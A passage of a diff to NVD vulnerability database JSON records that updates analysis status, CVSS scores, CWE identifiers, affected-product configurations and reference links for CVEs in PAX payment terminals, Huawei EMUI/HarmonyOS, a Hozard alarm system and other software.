"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:d190:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DB9483F8-5201-4F31-9F9A-F00A48C4C972"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}

281
CVE-2023/CVE-2023-421xx/CVE-2023-42137.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-42137",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:24.900",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:21:06.650",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -39,6 +59,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-59"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -50,22 +80,261 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a6650:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C020172-6E0C-4265-B4C9-ED93C84FE8AA"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFCD5218-5AA0-4086-926C-3EAEE1E43136"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a77:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0390BD9D-1FF7-456E-9394-34F009DE82CF"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D351F870-D43F-48B4-B2AC-0FDDD7B82ED4"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_max:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8612B592-DFE4-4B66-B24D-71EEA747FAA2"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:d190:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DB9483F8-5201-4F31-9F9A-F00A48C4C972"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}

4
CVE-2023/CVE-2023-439xx/CVE-2023-43985.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-43985",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.317",
"lastModified": "2024-01-19T14:15:12.317",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

101
CVE-2023/CVE-2023-441xx/CVE-2023-44112.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-44112",
"sourceIdentifier": "psirt@huawei.com",
"published": "2024-01-16T08:15:08.467",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:10:25.587",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "Vulnerabilidad de acceso fuera de los l\u00edmites en el m\u00f3dulo de autenticaci\u00f3n del dispositivo. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-125"
}
]
},
{
"source": "psirt@huawei.com",
"type": "Secondary",
@ -27,14 +60,72 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:11.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "511F8CE2-C2B6-4A08-B992-49D9B75B8655"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:12.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A974CA73-84E8-480B-BB4C-4A81D0C985B2"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:2.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20112231-B840-44D3-A061-B9B9F80EE378"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:2.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C01447F1-7F58-4AE3-B403-C01B2575D898"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545"
}
]
}
]
}
],
"references": [
{
"url": "https://consumer.huawei.com/en/support/bulletin/2024/1/",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
},
{
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
}
]
}

81
CVE-2023/CVE-2023-441xx/CVE-2023-44117.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-44117",
"sourceIdentifier": "psirt@huawei.com",
"published": "2024-01-16T08:15:08.573",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:11:54.657",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "Vulnerabilidad de relaciones de confianza siendo inexactas en escenarios distribuidos. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad del servicio."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
},
{
"source": "psirt@huawei.com",
"type": "Secondary",
@ -27,14 +60,52 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545"
}
]
}
]
}
],
"references": [
{
"url": "https://consumer.huawei.com/en/support/bulletin/2024/1/",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
},
{
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
}
]
}

81
CVE-2023/CVE-2023-45xx/CVE-2023-4566.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-4566",
"sourceIdentifier": "psirt@huawei.com",
"published": "2024-01-16T08:15:08.670",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:12:13.313",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "Vulnerabilidad de relaciones de confianza siendo inexactas en escenarios distribuidos. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad del servicio."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
},
{
"source": "psirt@huawei.com",
"type": "Secondary",
@ -27,14 +60,52 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545"
}
]
}
]
}
],
"references": [
{
"url": "https://consumer.huawei.com/en/support/bulletin/2024/1/",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
},
{
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
}
]
}

6
CVE-2023/CVE-2023-462xx/CVE-2023-46219.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-46219",
"sourceIdentifier": "support@hackerone.com",
"published": "2023-12-12T02:15:06.990",
"lastModified": "2023-12-24T13:15:08.290",
"lastModified": "2024-01-19T16:15:09.430",
"vulnStatus": "Modified",
"descriptions": [
{
@ -107,6 +107,10 @@
"Third Party Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0007/",
"source": "support@hackerone.com"
},
{
"url": "https://www.debian.org/security/2023/dsa-5587",
"source": "support@hackerone.com"

4
CVE-2023/CVE-2023-463xx/CVE-2023-46351.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-46351",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.367",
"lastModified": "2024-01-19T14:15:12.367",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

8
CVE-2023/CVE-2023-477xx/CVE-2023-47701.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-47701",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T01:15:12.340",
"lastModified": "2023-12-07T17:35:00.827",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.547",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -144,6 +144,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7087180",
"source": "psirt@us.ibm.com",

8
CVE-2023/CVE-2023-477xx/CVE-2023-47718.json
View File

@ -2,12 +2,16 @@
"id": "CVE-2023-47718",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2024-01-19T02:15:07.757",
"lastModified": "2024-01-19T02:15:07.757",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843."
},
{
"lang": "es",
"value": "IBM Maximo Asset Management 7.6.1.3 y Manage Component 8.10 a 8.11 son vulnerables a cross-site request forgery, lo que podr\u00eda permitir a un atacante ejecutar acciones maliciosas y no autorizadas transmitidas por un usuario en el que conf\u00eda el sitio web. ID de IBM X-Force: 271843."
}
],
"metrics": {

89
CVE-2023/CVE-2023-48xx/CVE-2023-4818.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-4818",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:25.180",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:35:49.683",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "El dispositivo PAX A920 permite degradar el gestor de arranque debido a un error en la verificaci\u00f3n de versi\u00f3n. La firma est\u00e1 correctamente comprobada y s\u00f3lo se puede utilizar el gestor de arranque firmado por PAX. El atacante debe tener acceso USB f\u00edsico al dispositivo para poder aprovechar esta vulnerabilidad."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "PHYSICAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.6,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 0.9,
"impactScore": 6.0
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-74"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -27,22 +60,64 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:7.1.2_aquarius_11.1.50_20230614:*:*:*:*:*:*:*",
"matchCriteriaId": "034C08E1-1DEB-43D2-A38A-736E1FEDE45C"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D351F870-D43F-48B4-B2AC-0FDDD7B82ED4"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}

6
CVE-2023/CVE-2023-492xx/CVE-2023-49285.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-49285",
"sourceIdentifier": "security-advisories@github.com",
"published": "2023-12-04T23:15:27.007",
"lastModified": "2024-01-09T02:15:44.903",
"lastModified": "2024-01-19T16:15:09.653",
"vulnStatus": "Modified",
"descriptions": [
{
@ -145,6 +145,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/",
"source": "security-advisories@github.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0004/",
"source": "security-advisories@github.com"
}
]
}

6
CVE-2023/CVE-2023-492xx/CVE-2023-49286.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-49286",
"sourceIdentifier": "security-advisories@github.com",
"published": "2023-12-04T23:15:27.243",
"lastModified": "2024-01-09T02:15:45.030",
"lastModified": "2024-01-19T16:15:09.793",
"vulnStatus": "Modified",
"descriptions": [
{
@ -139,6 +139,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/",
"source": "security-advisories@github.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0004/",
"source": "security-advisories@github.com"
}
]
}

6
CVE-2023/CVE-2023-492xx/CVE-2023-49288.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-49288",
"sourceIdentifier": "security-advisories@github.com",
"published": "2023-12-04T23:15:27.477",
"lastModified": "2023-12-29T03:15:11.580",
"lastModified": "2024-01-19T16:15:09.930",
"vulnStatus": "Modified",
"descriptions": [
{
@ -104,6 +104,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/",
"source": "security-advisories@github.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0006/",
"source": "security-advisories@github.com"
}
]
}

4
CVE-2023/CVE-2023-500xx/CVE-2023-50028.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-50028",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.413",
"lastModified": "2024-01-19T14:15:12.413",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

4
CVE-2023/CVE-2023-500xx/CVE-2023-50030.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-50030",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.453",
"lastModified": "2024-01-19T14:15:12.453",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

64
CVE-2023/CVE-2023-501xx/CVE-2023-50123.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-50123",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-11T21:15:10.573",
"lastModified": "2024-01-12T13:47:31.250",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:10:06.827",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,11 +14,67 @@
"value": "El n\u00famero de intentos para desarmar Hozard Alarm system (alarmsystemen) v1.0 no est\u00e1 limitado. Esto podr\u00eda permitir a un atacante realizar una fuerza bruta en la autenticaci\u00f3n por SMS para desarmar el sistema de alarma."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-307"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:hozard:alarm_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8F9A297A-6C1D-4276-8153-C23EE75FB0BB"
}
]
}
]
}
],
"references": [
{
"url": "https://www.secura.com/services/iot/consumer-products/security-concerns-in-popular-smart-home-devices",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

63
CVE-2023/CVE-2023-501xx/CVE-2023-50125.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-50125",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-11T21:15:10.680",
"lastModified": "2024-01-12T13:47:31.250",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:32:56.977",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,11 +14,66 @@
"value": "Una contrase\u00f1a de ingeniero predeterminada establecida en Hozard alarm system (Alarmsysteem) v1.0 permite a un atacante desarmar el sistema de alarma."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-522"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:hozard:alarm_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8F9A297A-6C1D-4276-8153-C23EE75FB0BB"
}
]
}
]
}
],
"references": [
{
"url": "https://www.secura.com/services/iot/consumer-products/security-concerns-in-popular-smart-home-devices",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
